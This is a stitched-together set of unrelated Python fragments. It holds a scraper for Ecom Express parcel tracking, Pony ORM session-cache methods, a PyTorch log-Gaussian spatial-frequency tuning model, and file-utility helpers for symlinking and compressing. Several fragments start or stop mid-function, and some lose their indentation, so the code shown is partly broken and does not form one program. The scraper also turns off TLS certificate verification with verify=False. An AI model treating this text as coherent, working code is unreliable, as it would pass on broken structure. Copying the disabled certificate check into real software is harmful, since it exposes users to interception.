            date = datetime.strptime(date, "%A, %B %d, %Y")
            location = row_cells[1].find('a').string.strip()
            # BUGFIX: the original used "location is ''" -- an identity
            # comparison, which is not a reliable empty-string test.
            if not location:  # ignore the days which are holidays
                continue
            status = row_cells[2].text.strip()
            self.tracking_data.append({'status': status, 'date': date, 'location': location})
        # Sort the checkpoints based on Date and Time --- this is important
        self.tracking_data = sorted(self.tracking_data, key=lambda k: k['date'])
class Ecomm_Tracker(Tracker):
'''
This class scrapes tracking data from the Ecomm express website.
'''
    def __init__(self,tracking_no):
        # Delegate all state initialisation to the shared Tracker base class.
        Tracker.__init__(self,tracking_no)
    def Get_Page(self):
        '''
        Fetches raw HTML data from the site for a given tracking_no
        '''
        url = 'https://billing.ecomexpress.in/track_me/multipleawb_open/?awb={}&order=&news_go=track+now'.format(self.tracking_no)
        # NOTE(review): these parameters are already encoded in the URL query
        # string; passing data= on a GET sends them again as a request body,
        # which is presumably redundant -- confirm before removing.
        data = {
            'awb':self.tracking_no,
            'order':'',
            'news_go':'track_now'
        }
        headers = {
            'Host': 'billing.ecomexpress.in',
            'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'DNT': '1',
            'Connection': 'keep-alive'
        }
        # request the server for the HTML data
        # NOTE(review): verify=False disables TLS certificate verification.
        response = requests.get(url,data=data,headers=headers,verify=False)
        self.page = response.content
def Extract_Checkpoints(self):
'''
Extract the checkpoints | |
new_dbval)
NOT_FOUND = object()
for attrs in obj._composite_keys_:
for attr in attrs:
if attr in avdict: break
else: continue
vals = [ get_val(a.name, NOT_LOADED) for a in attrs ]
currents = tuple(vals)
for i, attr in enumerate(attrs):
new_dbval = avdict.get(attr, NOT_FOUND)
if new_dbval is NOT_FOUND: continue
vals[i] = new_dbval
vals = tuple(vals)
cache.db_update_composite_index(obj, attrs, currents, vals)
for attr, new_dbval in avdict.iteritems():
obj._vals_[attr.name] = new_dbval
    def _delete_(obj, undo_funcs=None):
        # Delete obj from the session cache, cascading through (or blocking
        # on) its relationships.  undo_funcs collects rollback callbacks so a
        # failed recursive delete can be fully reverted; when it is None this
        # is the top-level call and we own the rollback on error.
        status = obj._status_
        if status in del_statuses: return
        is_recursive_call = undo_funcs is not None
        if not is_recursive_call: undo_funcs = []
        cache = obj._cache_
        cache.noflush += 1
        try:
            get_val = obj._vals_.get
            undo_list = []   # (index, old_key) pairs to restore on rollback
            undo_dict = {}   # attr -> old value to restore on rollback
            def undo_func():
                # Rollback helper: restore status, cached values and indexes.
                obj._status_ = status
                if status in ('loaded', 'saved'):
                    to_be_checked = cache.to_be_checked
                    if to_be_checked and to_be_checked[-1] is obj: to_be_checked.pop()
                    assert obj not in to_be_checked
                obj._vals_.update((attr.name, val) for attr, val in undo_dict.iteritems())
                for index, old_key in undo_list: index[old_key] = obj
            undo_funcs.append(undo_func)
            try:
                # Walk every relationship: cascade the delete, null out the
                # reverse side, or refuse with ConstraintError.
                for attr in obj._attrs_:
                    reverse = attr.reverse
                    if not reverse: continue
                    if not attr.is_collection:
                        val = get_val(attr.name, NOT_LOADED)
                        if val is None: continue
                        if not reverse.is_collection:
                            if val is NOT_LOADED: val = attr.load(obj)
                            if val is None: continue
                            if attr.cascade_delete: val._delete_()
                            elif not reverse.is_required: reverse.__set__(val, None, undo_funcs)
                            else: throw(ConstraintError, "Cannot delete object %s, because it has associated %s, "
                                                         "and 'cascade_delete' option of %s is not set"
                                                         % (obj, attr.name, attr))
                        elif isinstance(reverse, Set):
                            if val is NOT_LOADED: pass
                            else: reverse.reverse_remove((val,), obj, undo_funcs)
                        else: throw(NotImplementedError)
                    elif isinstance(attr, Set):
                        set_wrapper = attr.__get__(obj)
                        if not set_wrapper.__nonzero__(): pass
                        elif attr.cascade_delete:
                            for robj in set_wrapper: robj._delete_()
                        elif not reverse.is_required: attr.__set__(obj, (), undo_funcs)
                        else: throw(ConstraintError, "Cannot delete object %s, because it has non-empty set of %s, "
                                                     "and 'cascade_delete' option of %s is not set"
                                                     % (obj, attr.name, attr))
                    else: throw(NotImplementedError)
                # Remove obj from the simple-key indexes (remembering how to
                # restore them on rollback).
                for attr in obj._simple_keys_:
                    val = get_val(attr.name, NOT_LOADED)
                    if val is NOT_LOADED: continue
                    if val is None and cache.ignore_none: continue
                    index = cache.indexes.get(attr)
                    if index is None: continue
                    obj2 = index.pop(val)
                    assert obj2 is obj
                    undo_list.append((index, val))
                # Likewise for composite-key indexes.
                for attrs in obj._composite_keys_:
                    vals = tuple(get_val(a.name, NOT_LOADED) for a in attrs)
                    if NOT_LOADED in vals: continue
                    if cache.ignore_none and None in vals: continue
                    index = cache.indexes.get(attrs)
                    if index is None: continue
                    obj2 = index.pop(vals)
                    assert obj2 is obj
                    undo_list.append((index, vals))
                if status == 'created':
                    # Never hit the database: just cancel the pending INSERT.
                    obj._status_ = 'cancelled'
                    assert obj in cache.created
                    cache.created.remove(obj)
                    for attr in obj._attrs_:
                        if attr.pk_offset is not None: continue
                        obj._vals_.pop(attr.name, None)
                        if attr.is_collection:
                            mc = cache.modified_collections.get(attr)
                            if mc is not None: mc.discard(obj)
                    if obj._pkval_ is not None:
                        pk = obj.__class__.__dict__['_pk_']
                        del cache.indexes[pk][obj._pkval_]
                else:
                    # Object exists in the database: schedule a DELETE.
                    if status == 'updated': cache.updated.remove(obj)
                    elif status in ('loaded', 'saved'): cache.to_be_checked.append(obj)
                    else: assert status == 'to_be_checked'
                    obj._status_ = 'deleted'
                    cache.modified = True
                    cache.deleted.append(obj)
            except:
                # Only the top-level call unwinds the accumulated undo stack.
                if not is_recursive_call:
                    for undo_func in reversed(undo_funcs): undo_func()
                raise
        finally:
            cache.noflush -= 1
    @cut_traceback
    def delete(obj):
        # Public entry point for deletion; fails if the db_session is over.
        if not obj._cache_.is_alive: throw_db_session_is_over(obj)
        obj._delete_()
    @cut_traceback
    def set(obj, **kwargs):
        # Assign several attribute values at once, keeping the session
        # cache's unique indexes and reverse relationships consistent, with
        # full rollback if any single assignment fails.
        cache = obj._cache_
        if not cache.is_alive: throw_db_session_is_over(obj)
        if obj._status_ in del_statuses: throw_object_was_deleted(obj)
        cache.noflush += 1
        try:
            avdict, collection_avdict = obj._keyargs_to_avdicts_(kwargs)
            status = obj._status_
            wbits = obj._wbits_
            get_val = obj._vals_.get
            if avdict:
                # Pre-load one-to-one reverse attributes so the old values
                # are available for reverse-relation bookkeeping below.
                for attr in avdict:
                    old_val = get_val(attr.name, NOT_LOADED)
                    if old_val is NOT_LOADED and attr.reverse and not attr.reverse.is_collection:
                        attr.load(obj)
                if wbits is not None:
                    # Record which attributes were written and mark the
                    # object as updated in the session cache.
                    new_wbits = wbits
                    for attr in avdict: new_wbits |= obj._bits_[attr]
                    obj._wbits_ = new_wbits
                    if status != 'updated':
                        obj._status_ = 'updated'
                        cache.modified = True
                        cache.updated.add(obj)
                        if status in ('loaded', 'saved'): cache.to_be_checked.append(obj)
                        else: assert status == 'to_be_checked'
                if not collection_avdict:
                    # Fast path: no collections, no reverse relations and no
                    # unique-index members -- just store the values.
                    for attr in avdict:
                        if attr.reverse or attr.is_part_of_unique_index: break
                    else:
                        obj._vals_.update((attr.name, new_val) for attr, new_val in avdict.iteritems())
                        return
            undo_funcs = []
            undo = []  # (index, old_key, new_key) triples for index rollback
            def undo_func():
                # Rollback helper: restore status, write-bits and indexes.
                obj._status_ = status
                obj._wbits_ = wbits
                if wbits == 0: cache.updated.remove(obj)
                if status in ('loaded', 'saved'):
                    to_be_checked = cache.to_be_checked
                    if to_be_checked and to_be_checked[-1] is obj: to_be_checked.pop()
                    assert obj not in to_be_checked
                for index, old_key, new_key in undo:
                    if new_key is NO_UNDO_NEEDED: pass
                    else: del index[new_key]
                    if old_key is NO_UNDO_NEEDED: pass
                    else: index[old_key] = obj
            NOT_FOUND = object()
            try:
                # Re-key the simple unique indexes for changed attributes.
                for attr in obj._simple_keys_:
                    new_val = avdict.get(attr, NOT_FOUND)
                    if new_val is NOT_FOUND: continue
                    old_val = get_val(attr.name, NOT_LOADED)
                    if old_val == new_val: continue
                    cache.update_simple_index(obj, attr, old_val, new_val, undo)
                # Re-key composite unique indexes touched by any changed attr.
                for attrs in obj._composite_keys_:
                    for attr in attrs:
                        if attr in avdict: break
                    else: continue
                    vals = [ get_val(a.name, NOT_LOADED) for a in attrs ]
                    currents = tuple(vals)
                    for i, attr in enumerate(attrs):
                        new_val = avdict.get(attr, NOT_FOUND)
                        if new_val is NOT_FOUND: continue
                        vals[i] = new_val
                    vals = tuple(vals)
                    cache.update_composite_index(obj, attrs, currents, vals, undo)
                # Keep both sides of reverse relationships in sync.
                for attr, new_val in avdict.iteritems():
                    if not attr.reverse: continue
                    old_val = get_val(attr.name, NOT_LOADED)
                    attr.update_reverse(obj, old_val, new_val, undo_funcs)
                # Collection attributes go through their own descriptor.
                for attr, new_val in collection_avdict.iteritems():
                    attr.__set__(obj, new_val, undo_funcs)
            except:
                for undo_func in undo_funcs: undo_func()
                raise
            obj._vals_.update((attr.name, new_val) for attr, new_val in avdict.iteritems())
        finally:
            cache.noflush -= 1
def _keyargs_to_avdicts_(obj, kwargs):
avdict, collection_avdict = {}, {}
get = obj._adict_.get
for name, new_val in kwargs.items():
attr = get(name)
if attr is None: throw(TypeError, 'Unknown attribute %r' % name)
new_val = attr.check(new_val, obj, from_db=False)
if not attr.is_collection:
if attr.pk_offset is not None:
old_val = obj._vals_.get(attr.name, NOT_LOADED)
if old_val != new_val: throw(TypeError, 'Cannot change value of primary key attribute %s' % attr.name)
else: avdict[attr] = new_val
else: collection_avdict[attr] = new_val
return avdict, collection_avdict
    @cut_traceback
    def check_on_commit(obj):
        # Mark a clean ('loaded'/'saved') object so its optimistic read state
        # is re-validated against the database at commit time.
        cache = obj._cache_
        if not cache.is_alive: throw_db_session_is_over(obj)
        # Created/updated/deleted objects are already checked at commit.
        if obj._status_ not in ('loaded', 'saved'): return
        obj._status_ = 'to_be_checked'
        cache.to_be_checked.append(obj)
@classmethod
def _attrs_with_bit_(entity, mask=-1):
get_bit = entity._bits_.get
for attr in entity._attrs_:
bit = get_bit(attr)
if bit is None: continue
if not bit & mask: continue
yield attr
    def _construct_optimistic_criteria_(obj):
        # Build the column/converter/value lists used for the optimistic
        # WHERE clause: every attribute that was *read* in this transaction
        # (per obj._rbits_) must still hold its originally loaded db value.
        optimistic_columns = []
        optimistic_converters = []
        optimistic_values = []
        for attr in obj._attrs_with_bit_(obj._rbits_):
            if not attr.columns: continue
            dbval = obj._dbvals_.get(attr.name, NOT_LOADED)
            assert dbval is not NOT_LOADED
            optimistic_columns.extend(attr.columns)
            if dbval is not None:
                optimistic_converters.extend(attr.converters)
            else:
                # A None db value is compared with IS NULL -- no converter.
                optimistic_converters.extend(None for converter in attr.converters)
            optimistic_values.extend(attr.get_raw_values(dbval))
        return optimistic_columns, optimistic_converters, optimistic_values
    def _save_principal_objects_(obj, dependent_objects):
        # Before saving obj, save every newly created object it references
        # through a foreign key, so the FK values exist in the database.
        # dependent_objects tracks the current chain to detect cycles.
        if dependent_objects is None: dependent_objects = []
        elif obj in dependent_objects:
            chain = ' -> '.join(obj2.__class__.__name__ for obj2 in dependent_objects)
            throw(UnresolvableCyclicDependency, 'Cannot save cyclic chain: ' + chain)
        dependent_objects.append(obj)
        status = obj._status_
        if status == 'created': attr_iter = obj._attrs_with_bit_()
        elif status == 'updated': attr_iter = obj._attrs_with_bit_(obj._wbits_)
        else: assert False
        for attr in attr_iter:
            val = obj._vals_[attr.name]
            if not attr.reverse: continue
            if not attr.columns: continue
            if val is None: continue
            if val._status_ == 'created':
                # Recursive save of the referenced (principal) object first.
                val._save_(dependent_objects)
                assert val._status_ == 'saved'
    def _save_created_(obj):
        # Emit the INSERT for a newly created object.  The generated SQL is
        # cached per entity (with or without the auto-generated pk column).
        values = []
        auto_pk = (obj._pkval_ is None)
        if auto_pk: pk = obj.__class__.__dict__['_pk_']
        for attr in obj._attrs_:
            if not attr.columns: continue
            if attr.is_collection: continue
            val = obj._vals_[attr.name]
            # An auto-generated pk is assigned by the database, not inserted.
            if auto_pk and attr.is_pk: continue
            values.extend(attr.get_raw_values(val))
        database = obj._database_
        if auto_pk: cached_sql = obj._cached_create_sql_auto_pk_
        else: cached_sql = obj._cached_create_sql_
        if cached_sql is None:
            # First insert for this entity: build and cache the SQL AST.
            entity = obj.__class__
            if auto_pk:
                columns = entity._columns_without_pk_
                converters = entity._converters_without_pk_
            else:
                columns = entity._columns_
                converters = entity._converters_
            assert len(columns) == len(converters)
            params = [ [ 'PARAM', i, converter ] for i, converter in enumerate(converters) ]
            sql_ast = [ 'INSERT', entity._table_, columns, params ]
            if auto_pk:
                assert len(entity._pk_columns_) == 1
                assert pk.auto
                sql_ast.append(obj._pk_columns_[0])
            sql, adapter = database._ast2sql(sql_ast)
            if auto_pk: entity._cached_create_sql_auto_pk_ = sql, adapter
            else: entity._cached_create_sql_ = sql, adapter
        else: sql, adapter = cached_sql
        arguments = adapter(values)
        try:
            if auto_pk: new_id = database._exec_sql(sql, arguments, returning_id=True)
            else: database._exec_sql(sql, arguments)
        except IntegrityError, e:
            msg = " ".join(tostring(arg) for arg in e.args)
            throw(TransactionIntegrityError,
                  'Object %r cannot be stored in the database (probably it already exists). %s: %s'
                  % (obj, e.__class__.__name__, msg), e)
        except DatabaseError, e:
            msg = " ".join(tostring(arg) for arg in e.args)
            throw(UnexpectedError, 'Object %r cannot be stored in the database. %s: %s'
                                   % (obj, e.__class__.__name__, msg), e)
        if auto_pk:
            # Register the freshly generated id in the session pk index.
            index = obj._cache_.indexes.setdefault(pk, {})
            obj2 = index.setdefault(new_id, obj)
            if obj2 is not obj: throw(TransactionIntegrityError,
                'Newly auto-generated id value %s was already used in transaction cache for another object' % new_id)
            obj._pkval_ = obj._vals_[pk.name] = new_id
            obj._newid_ = None
        obj._status_ = 'saved'
        # All stored values are now known to match the database exactly.
        obj._rbits_ = obj._all_bits_
        obj._wbits_ = 0
        bits = obj._bits_
        for attr in obj._attrs_:
            if attr not in bits: continue
            obj._dbvals_[attr.name] = obj._vals_[attr.name]
def _save_updated_(obj):
update_columns = []
values = []
for attr in obj._attrs_with_bit_(obj._wbits_):
if not attr.columns: continue
update_columns.extend(attr.columns)
val = | |
<reponame>billbrod/spatial-frequency-model
#!/usr/bin/python
"""2d tuning model
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import torch
import warnings
import itertools
import re
from scipy import stats
# Canonical ordering of the model variants, from most constrained to fully
# parameterized.  Each name encodes three choices:
#   {eccentricity_type}_donut_period-{period_orientation_type}_amps-{amplitude_orientation_type}
MODEL_ORDER = ['constant_donut_period-iso_amps-iso', 'scaling_donut_period-iso_amps-iso',
               'full_donut_period-iso_amps-iso', 'full_donut_period-absolute_amps-iso',
               'full_donut_period-relative_amps-iso', 'full_donut_period-full_amps-iso',
               'full_donut_period-iso_amps-absolute', 'full_donut_period-iso_amps-relative',
               'full_donut_period-iso_amps-full', 'full_donut_period-absolute_amps-absolute',
               'full_donut_period-relative_amps-relative', 'full_donut_period-full_amps-absolute',
               'full_donut_period-full_amps-relative', 'full_donut_period-full_amps-full']
# 1-based model numbers used when plotting, one per entry in MODEL_ORDER.
MODEL_PLOT_ORDER = list(range(1, len(MODEL_ORDER)+1))
def _cast_as_tensor(x):
if type(x) == pd.Series:
x = x.values
# needs to be float32 to work with the Hessian calculations
return torch.tensor(x, dtype=torch.float32)
def _cast_as_param(x, requires_grad=True):
    """Wrap x in a trainable float32 torch Parameter."""
    tensor = _cast_as_tensor(x)
    return torch.nn.Parameter(tensor, requires_grad=requires_grad)
def _cast_args_as_tensors(args, on_cuda=False):
    """Return args as a list of tensors, optionally moved to the GPU.

    Values that are already tensors are passed through unchanged (apart
    from the optional .cuda() move).
    """
    tensors = []
    for arg in args:
        tensor = arg if torch.is_tensor(arg) else _cast_as_tensor(arg)
        if on_cuda:
            tensor = tensor.cuda()
        tensors.append(tensor)
    return tensors
def _check_and_reshape_tensors(x, y):
if (x.ndimension() == 1 and y.ndimension() == 1) and (x.shape != y.shape):
x = x.repeat(len(y), 1)
y = y.repeat(x.shape[1], 1).transpose(0, 1)
return x, y
def _check_log_gaussian_params(param_vals, train_params, period_orientation_type,
eccentricity_type, amplitude_orientation_type):
if period_orientation_type in ['relative', 'iso']:
for angle in ['cardinals', 'obliques']:
if param_vals[f'abs_mode_{angle}'] != 0:
# when parsing from df, these can be nan. don't need
# to raise the warning in that case
if not np.isnan(param_vals[f'abs_mode_{angle}']):
warnings.warn(f"When period_orientation_type is {period_orientation_type}, "
"all absolute variables must be 0, correcting this...")
param_vals[f'abs_mode_{angle}'] = 0
train_params[f'abs_mode_{angle}'] = False
if period_orientation_type in ['absolute', 'iso']:
for angle in ['cardinals', 'obliques']:
if param_vals[f'rel_mode_{angle}'] != 0:
# when parsing from df, these can be nan. don't need
# to raise the warning in that case
if not np.isnan(param_vals[f'rel_mode_{angle}']):
warnings.warn(f"When period_orientation_type is {period_orientation_type}, "
"all relative variables must be 0, correcting this...")
param_vals[f'rel_mode_{angle}'] = 0
train_params[f'rel_mode_{angle}'] = False
if period_orientation_type not in ['relative', 'absolute', 'iso', 'full']:
raise Exception("Don't know how to handle period_orientation_type "
f"{period_orientation_type}!")
if amplitude_orientation_type in ['relative', 'iso']:
for angle in ['cardinals', 'obliques']:
if param_vals[f'abs_amplitude_{angle}'] != 0:
# when parsing from df, these can be nan. don't need
# to raise the warning in that case
if not np.isnan(param_vals[f'abs_amplitude_{angle}']):
warnings.warn(f"When amplitude_orientation_type is {amplitude_orientation_type}, "
"all absolute variables must be 0, correcting this...")
param_vals[f'abs_amplitude_{angle}'] = 0
train_params[f'abs_amplitude_{angle}'] = False
if amplitude_orientation_type in ['absolute', 'iso']:
for angle in ['cardinals', 'obliques']:
if param_vals[f'rel_amplitude_{angle}'] != 0:
# when parsing from df, these can be nan. don't need
# to raise the warning in that case
if not np.isnan(param_vals[f'rel_amplitude_{angle}']):
warnings.warn(f"When amplitude_orientation_type is {amplitude_orientation_type}, "
"all relative variables must be 0, correcting this...")
param_vals[f'rel_amplitude_{angle}'] = 0
train_params[f'rel_amplitude_{angle}'] = False
if amplitude_orientation_type not in ['relative', 'absolute', 'iso', 'full']:
raise Exception("Don't know how to handle amplitude_orientation_type "
f"{amplitude_orientation_type}!")
if eccentricity_type == 'scaling':
if param_vals['sf_ecc_intercept'] != 0:
# when parsing from df, these can be nan. don't need
# to raise the warning in that case
if not np.isnan(param_vals[f'sf_ecc_intercept']):
warnings.warn("When eccentricity_type is scaling, sf_ecc_intercept must be 0! "
"correcting...")
param_vals['sf_ecc_intercept'] = 0
train_params['sf_ecc_intercept'] = False
elif eccentricity_type == 'constant':
if param_vals['sf_ecc_slope'] != 0:
# when parsing from df, these can be nan. don't need
# to raise the warning in that case
if not np.isnan(param_vals[f'sf_ecc_slope']):
warnings.warn("When eccentricity_type is constant, sf_ecc_slope must be 0! "
"correcting...")
param_vals['sf_ecc_slope'] = 0
train_params['sf_ecc_slope'] = False
elif eccentricity_type != 'full':
raise Exception("Don't know how to handle eccentricity_type %s!" % eccentricity_type)
return param_vals, train_params
class LogGaussianDonut(torch.nn.Module):
"""simple LogGaussianDonut in pytorch
orientation_type, eccentricity_type, vary_amplitude: together specify what
kind of model to train
period_orientation_type: {iso, absolute, relative, full}.
How we handle the effect of orientation on preferred period:
- iso: model is isotropic, predictions identical for all orientations.
- absolute: model can fit differences in absolute orientation, that is, in Cartesian
coordinates, such that sf_angle=0 correponds to "to the right"
- relative: model can fit differences in relative orientation, that is, in retinal polar
coordinates, such that sf_angle=0 corresponds to "away from the fovea"
- full: model can fit differences in both absolute and relative orientations
eccentricity_type: {scaling, constant, full}.
How we handle the effect of eccentricity on preferred period
- scaling: model's relationship between preferred period and eccentricity is exactly scaling,
that is, the preferred period is equal to the eccentricity.
- constant: model's relationship between preferred period and eccentricity is exactly constant,
that is, it does not change with eccentricity but is flat.
- full: model discovers the relationship between eccentricity and preferred period, though it
is constrained to be linear (i.e., model solves for a and b in $period = a * eccentricity +
b$)
amplitude_orientation_type: {iso, absolute, relative, full}.
How we handle the effect of orientation on maximum amplitude:
- iso: model is isotropic, predictions identical for all orientations.
- absolute: model can fit differences in absolute orientation, that is, in Cartesian
coordinates, such that sf_angle=0 correponds to "to the right"
- relative: model can fit differences in relative orientation, that is, in retinal polar
coordinates, such that sf_angle=0 corresponds to "away from the fovea"
- full: model can fit differences in both absolute and relative orientations
all other parameters are initial values. whether they will be fit or not (i.e., whether they
have `requires_grad=True`) depends on the values of `orientation_type`, `eccentricity_type` and
`vary_amplitude`
when you call this model, sf_angle should be the (absolute) orientation of the grating, so that
sf_angle=0 corresponds to "to the right". That is, regardless of whether the model considers
the absolute orientation, relative orientation, neither or both to be important, you always
call it with the absolute orientation.
"""
def __init__(self, period_orientation_type='iso', eccentricity_type='full',
amplitude_orientation_type='iso', sigma=.4, sf_ecc_slope=1, sf_ecc_intercept=0,
abs_mode_cardinals=0, abs_mode_obliques=0, rel_mode_cardinals=0,
rel_mode_obliques=0, abs_amplitude_cardinals=0, abs_amplitude_obliques=0,
rel_amplitude_cardinals=0, rel_amplitude_obliques=0):
super().__init__()
train_kwargs = {}
kwargs = {}
for ori, param, angle in itertools.product(['abs', 'rel'], ['mode', 'amplitude'],
['cardinals', 'obliques']):
train_kwargs['%s_%s_%s' % (ori, param, angle)] = True
kwargs['%s_%s_%s' % (ori, param, angle)] = eval('%s_%s_%s' % (ori, param, angle))
for var in ['slope', 'intercept']:
train_kwargs['sf_ecc_%s' % var] = True
kwargs['sf_ecc_%s' % var] = eval("sf_ecc_%s" % var)
kwargs, train_kwargs = _check_log_gaussian_params(kwargs, train_kwargs,
period_orientation_type,
eccentricity_type,
amplitude_orientation_type)
self.period_orientation_type = period_orientation_type
self.amplitude_orientation_type = amplitude_orientation_type
self.eccentricity_type = eccentricity_type
self.model_type = (f'{eccentricity_type}_donut_period-{period_orientation_type}_'
f'amps-{amplitude_orientation_type}')
self.sigma = _cast_as_param(sigma)
self.abs_amplitude_cardinals = _cast_as_param(kwargs['abs_amplitude_cardinals'],
train_kwargs['abs_amplitude_cardinals'])
self.abs_amplitude_obliques = _cast_as_param(kwargs['abs_amplitude_obliques'],
train_kwargs['abs_amplitude_obliques'])
self.rel_amplitude_cardinals = _cast_as_param(kwargs['rel_amplitude_cardinals'],
train_kwargs['rel_amplitude_cardinals'])
self.rel_amplitude_obliques = _cast_as_param(kwargs['rel_amplitude_obliques'],
train_kwargs['rel_amplitude_obliques'])
self.abs_mode_cardinals = _cast_as_param(kwargs['abs_mode_cardinals'],
train_kwargs['abs_mode_cardinals'])
self.abs_mode_obliques = _cast_as_param(kwargs['abs_mode_obliques'],
train_kwargs['abs_mode_obliques'])
self.rel_mode_cardinals = _cast_as_param(kwargs['rel_mode_cardinals'],
train_kwargs['rel_mode_cardinals'])
self.rel_mode_obliques = _cast_as_param(kwargs['rel_mode_obliques'],
train_kwargs['rel_mode_obliques'])
self.sf_ecc_slope = _cast_as_param(kwargs['sf_ecc_slope'],
train_kwargs['sf_ecc_slope'])
self.sf_ecc_intercept = _cast_as_param(kwargs['sf_ecc_intercept'],
train_kwargs['sf_ecc_intercept'])
@classmethod
def init_from_df(cls, df):
"""initialize from the dataframe we make summarizing the models
the df must only contain a single model (that is, it should only have 11 rows, one for each
parameter value, and a unique value for the column fit_model_type)
"""
fit_model_type = df.fit_model_type.unique()
if len(fit_model_type) > 1 or len(df) != 11:
raise Exception("df must contain exactly one model!")
params = {}
for i, row in df.iterrows():
params[row.model_parameter] = row.fit_value
# we may have renamed the model type to the version we used for
# plotting in the paper. if so, this will map it back to the original
# version so our re.findall will work as expected
model_name_map = dict(zip(MODEL_PLOT_ORDER, MODEL_ORDER))
fit_model_type = model_name_map.get(fit_model_type[0], fit_model_type[0])
parse_string = r'([a-z]+)_donut_period-([a-z]+)_amps-([a-z]+)'
ecc, period, amps = re.findall(parse_string, fit_model_type)[0]
return cls(period, ecc, amps, **params)
def __str__(self):
# so we can see the parameters
return ("{0}(sigma: {1:.03f}, sf_ecc_slope: {2:.03f}, sf_ecc_intercept: {3:.03f}, "
"abs_amplitude_cardinals: {4:.03f}, abs_amplitude_obliques: {5:.03f}, "
"abs_mode_cardinals: {6:.03f}, abs_mode_obliques: {7:.03f}, "
"rel_amplitude_cardinals: {8:.03f}, rel_amplitude_obliques: {9:.03f}, "
"rel_mode_cardinals: {10:.03f}, rel_mode_obliques: {11:.03f})").format(
type(self).__name__, self.sigma, self.sf_ecc_slope, self.sf_ecc_intercept,
self.abs_amplitude_cardinals, self.abs_amplitude_obliques,
self.abs_mode_cardinals, self.abs_mode_obliques, self.rel_amplitude_cardinals,
self.rel_amplitude_obliques, self.rel_mode_cardinals, self.rel_mode_obliques)
def __repr__(self):
return self.__str__()
def _create_mag_angle(self, extent=(-10, 10), n_samps=1001):
x = torch.linspace(extent[0], extent[1], n_samps)
x, y = torch.meshgrid(x, x)
r = torch.sqrt(torch.pow(x, 2) + torch.pow(y, 2))
th = torch.atan2(y, x)
return r, th
def create_image(self, vox_ecc, vox_angle, extent=None, n_samps=None):
vox_ecc, vox_angle = _cast_args_as_tensors([vox_ecc, vox_angle], self.sigma.is_cuda)
if vox_ecc.ndimension() == 0:
vox_ecc = vox_ecc.unsqueeze(-1)
vox_angle = vox_angle.unsqueeze(-1)
if extent is None:
extent = (-self.stim_radius_degree, self.stim_radius_degree)
if n_samps is None:
n_samps = self.image_size
r, th = self._create_mag_angle(extent, n_samps)
return self.evaluate(r.repeat(len(vox_ecc), 1, 1), th.repeat(len(vox_ecc), 1, 1),
vox_ecc, vox_angle)
def preferred_period_contour(self, preferred_period, vox_angle, sf_angle=None,
rel_sf_angle=None):
"""return eccentricity that has specified preferred_period for given sf_angle, vox_angle
either sf_angle or rel_sf_angle can be set
"""
if ((sf_angle is None and rel_sf_angle is None) or
(sf_angle is not None and rel_sf_angle is not None)):
raise Exception("Either sf_angle or rel_sf_angle must be set!")
| |
(str | None): Destination file or folder
overwrite (bool | None): True: replace existing, False: fail if destination exists, None: no destination check
fatal (type | bool | None): True: abort execution on failure, False: don't abort but log, None: don't abort, don't log
logger (callable | bool | None): Logger to use, True to print(), False to trace(), None to disable log chatter
dryrun (bool): Optionally override current dryrun setting
Returns:
(int): In non-fatal mode, 1: successfully done, 0: was no-op, -1: failed
"""
return _file_op(source, destination, _move, overwrite, fatal, logger, dryrun)
def symlink(source, destination, must_exist=True, overwrite=True, fatal=True, logger=UNSET, dryrun=UNSET):
    """Symlink `source` <- `destination`

    Args:
        source (str | Path | None): Source file or folder
        destination (str | Path | None): Destination file or folder
        must_exist (bool): If True, verify that source does indeed exist
        overwrite (bool | None): True: replace existing, False: fail if destination exists, None: no destination check
        fatal (type | bool | None): True: abort execution on failure, False: don't abort but log, None: don't abort, don't log
        logger (callable | bool | None): Logger to use, True to print(), False to trace(), None to disable log chatter
        dryrun (bool): Optionally override current dryrun setting

    Returns:
        (int): In non-fatal mode, 1: successfully done, 0: was no-op, -1: failed
    """
    # Delegate to the generic wrapper; _symlink() does the actual linking
    # (and makes the link relative when source lives under destination's parent)
    return _file_op(source, destination, _symlink, overwrite, fatal, logger, dryrun, must_exist=must_exist)
def compress(source, destination, arcname=UNSET, ext=None, overwrite=True, fatal=True, logger=UNSET, dryrun=UNSET):
    """Compress `source` into archive `destination`

    Args:
        source (str | Path | None): Source folder to compress
        destination (str | Path | None): Destination folder
        arcname (str | None): Name of subfolder in archive (default: source basename)
        ext (str | None): Extension determining compression (default: extension of given 'destination' file)
        overwrite (bool | None): True: replace existing, False: fail if destination exists, None: no destination check
        fatal (type | bool | None): True: abort execution on failure, False: don't abort but log, None: don't abort, don't log
        logger (callable | bool | None): Logger to use, True to print(), False to trace(), None to disable log chatter
        dryrun (bool): Optionally override current dryrun setting

    Returns:
        (int): In non-fatal mode, 1: successfully done, 0: was no-op, -1: failed
    """
    if not ext:
        # Note: compression format is inferred from the DESTINATION's extension
        _, _, ext = str(destination).lower().rpartition(".")
    kwargs = {}
    # Normalize to a short canonical form (e.g. "zip", "tar", "gz")
    ext = SYS_INFO.platform_id.canonical_compress_extension(ext, short_form=True)
    if not ext:
        message = "Unknown extension '%s': can't compress file" % os.path.basename(destination)
        return abort(message, return_value=-1, fatal=fatal, logger=logger)
    if arcname is UNSET:
        arcname = os.path.basename(source)
    arcname = to_path(arcname or "")
    if ext == "zip":
        func = _zip
    else:
        func = _tar
        # tarfile mode: "w:" for plain tar, otherwise e.g. "w:gz"
        kwargs["mode"] = "w:" if ext == "tar" else "w:%s" % ext
    return _file_op(source, destination, func, overwrite, fatal, logger, dryrun, arcname=arcname, **kwargs)
def decompress(source, destination, ext=None, overwrite=True, simplify=False, fatal=True, logger=UNSET, dryrun=UNSET):
    """Decompress archive `source` into folder `destination`

    Args:
        source (str | Path | None): Source file to decompress
        destination (str | Path | None): Destination folder
        ext (str | None): Extension determining compression (default: extension of given 'source' file)
        overwrite (bool | None): True: replace existing, False: fail if destination exists, None: no destination check
        simplify (bool): If True and source has only one sub-folder, extract that one sub-folder to destination
        fatal (type | bool | None): True: abort execution on failure, False: don't abort but log, None: don't abort, don't log
        logger (callable | bool | None): Logger to use, True to print(), False to trace(), None to disable log chatter
        dryrun (bool): Optionally override current dryrun setting

    Returns:
        (int): In non-fatal mode, 1: successfully done, 0: was no-op, -1: failed
    """
    if not ext:
